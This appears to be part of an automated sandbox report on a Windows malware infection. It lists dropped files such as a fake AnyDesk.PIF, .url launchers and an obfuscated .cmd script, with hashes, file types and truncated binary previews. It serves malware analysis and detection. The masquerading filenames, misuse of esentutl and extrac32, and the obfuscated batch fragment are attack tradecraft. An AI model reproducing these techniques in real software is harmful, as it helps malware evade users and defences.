                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DA4101EBA193661F3016D2B4B6328CF8D0CB16AC58C1470683BC07D8BAF34EBE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B7CACC98C0D5C7B3F03CDE8B294CB6534BE25C560E78C6CF5304285774B56493E98346152A587162D1347EDDC7F751BD164A78DD257383B0B59B37D89D6BA5A8
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900b2050000000d000000000054c705000010000000d005000000400000100000000200000400000000000000040000000000000000501300000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000300600c825000000f0060000540c0000000000000000000000000000000000008006001c640000000000000000000000000000000000000000000000000000007006001800000000000000000000000000000000000000f8360600e00500000000000000000000000000000000000000000000

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Juqmtmya.url

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):104
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.168706785966594
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMsiBsOsbxqV19Iov:HRYFVmTWDyzmBsOExubIy
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AF3D350E64B6E92F878DCD271014658C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C4F0893B99C22C06E8B7464A140C847E10F9533D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0CAEB9DB82E69A560740E26D1715396469C2949F9B2A643D6067443CEE3B8F55
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3E32503934D42B68F7CC8ECABC421BA673D95A73AF25A9B9BFA7E2F96A8A51D5CC945C7F219D05A40317395E713560076CA36D8A6D37F2206AD7A30061E48DA4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF"..IconIndex=922160..HotKey=23..

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\AnyDesk.PIF

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1226240
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.728338717271886
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IYSEI2pcNM1rQrHdo/QmTsEJX+2CkEpV4gMU/u8pL3bLccgQJwxVqb1gsNSrAjEy:IbK/QmoEJX+2CkEpV4gMU/uSLIam6Q
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2EF70D96354CC04D9168E8F69E7B17A0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92EEE1BB5DE4F4D50805101B83E4A3A1A602856B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5842B3E5271EFED831BF21F4821431BB1A7DCC94BAFAB135B62D34BFDB32F503
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3C46F059B5E2C806EFDFEA71DAD8BCC236BFC753DC3B15E637D6697231313B68232D0F4BC6921B41ED76F2471891718678EC7B6C6DDA0A5D7C9F7AE8A57580B3
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...........................0...%.......T.......................d...........................p.......................6...............................text............................... ..`.itext.............................. ..`.data...\...........................@....bss.....7...............................idata...%...0...&..................@....tls....4....`...........................rdata.......p......................@..@.reloc...d.......f..................@..B.rsrc....T.......T...b..............@..@.............P......................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\Juqmtmya

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2386716
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.750563994554051
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:y4lGgAK/eHLG7HcOEPQW1LM9Cwyq7uP6yIFBlZ:ppAqyGTE1o9PPyOBlZ
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5E9E591803218A9803C8F7B2C63DD663
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8711875A288EBD187AFFE45CD31EC8E55D05FDB1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BD53A567B8ED172FE46F5396276B2FA285CB9FCE1748411EB42960833CBC9A93
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:407B99B5AA46998EECCEED92484C0BDFE86EF56FA9AB1BAC83F13B3615EF1CCC898B0DEEC6A02F1659637B6723AE474781955E7A5EB8B28450210C734BE4503E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:...Y#..K..... .$..!.!'&..&.......%..... ........ %.....Y#..KU"..!.&..&&...Y#..K^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyr.Rh-kca.e_p.f.law9wkv`.bvms.k\{{._g<Qp).9j8....l+.5a..Gw..5^..@.3\^T....7ct[.h.....yr...d..Y.7^r..4.v.\*

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\Juqmtmya.PIF

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1226240
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.728338717271886
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IYSEI2pcNM1rQrHdo/QmTsEJX+2CkEpV4gMU/u8pL3bLccgQJwxVqb1gsNSrAjEy:IbK/QmoEJX+2CkEpV4gMU/uSLIam6Q
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2EF70D96354CC04D9168E8F69E7B17A0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92EEE1BB5DE4F4D50805101B83E4A3A1A602856B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5842B3E5271EFED831BF21F4821431BB1A7DCC94BAFAB135B62D34BFDB32F503
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3C46F059B5E2C806EFDFEA71DAD8BCC236BFC753DC3B15E637D6697231313B68232D0F4BC6921B41ED76F2471891718678EC7B6C6DDA0A5D7C9F7AE8A57580B3
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...........................0...%.......T.......................d...........................p.......................6...............................text............................... ..`.itext.............................. ..`.data...\...........................@....bss.....7...............................idata...%...0...&..................@....tls....4....`...........................rdata.......p......................@..@.reloc...d.......f..................@..B.rsrc....T.......T...b..............@..@.............P......................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\PNO

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Eovn:Eov
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:056960930E28DB14EAA54F2A494F8625
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1550D1D630F292833CC5B4F251923B5A27B99BE0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5A7CAAD39BADD4848563FE7402F185C7E1FF0A8416B2DBCE8FEF86137B2D79C3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:61C084B6061CCC127C44255F4F2801D638753ABD91D698B45FB8BCAE4F46A1AB491F95E7C210F561316A733372CBB04F10D6BE4D08AACB1ACB7B7030085A46FF
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:18..

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\aymtmquJ.cmd

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):62357
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\aymtmquJ.pif

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):68096
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\alpha.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):289792
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.135598950357573
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\alpha.pif

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):236544
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.4416694948877025
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\kn.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1651712
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.144018815244304
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\xpha.pif

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18944
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.742964649637377
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.379540626579189
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:BWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:BLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6FC9D6C4B59B9854B6FA4C5858A872DF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4A7108215B0DD5BE96B3D0D398866CE557463F94
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F5CDE8D7DED71060D874E4A9A0E0409BD7FAC176A04C9FBEAF5D7F7737152438
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C753C577665F9F7BAF154C00CD8F2294B7B971576A788E028E383A876A52E24C4014BA9354630E5115056F4394D2179839F7B465C049453D82CFC03DD448A164
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1425408
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.680690579464684
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Zk70Trcosu4CTPpR9+aHsqjnhMgeiCl7G0nehbGZpbD:ZkQTAW5v+ADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:51A2DCBBA6BCBB069A3A5AB77659D46E98B02289
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A7BA9EAC2A255CAB335D7B0D00DA00C962E2BECC8AEBF313434E861C502D5DD9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E3CB79FB953D247C98B06E64EFE737D53EB57233B43B4FD2A637EBD0F5C9FF088ADCAF4CFFC095AA6A6CE7B87F4B9812D1D8B76A0D27BBBBB4955FA57260ADB7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
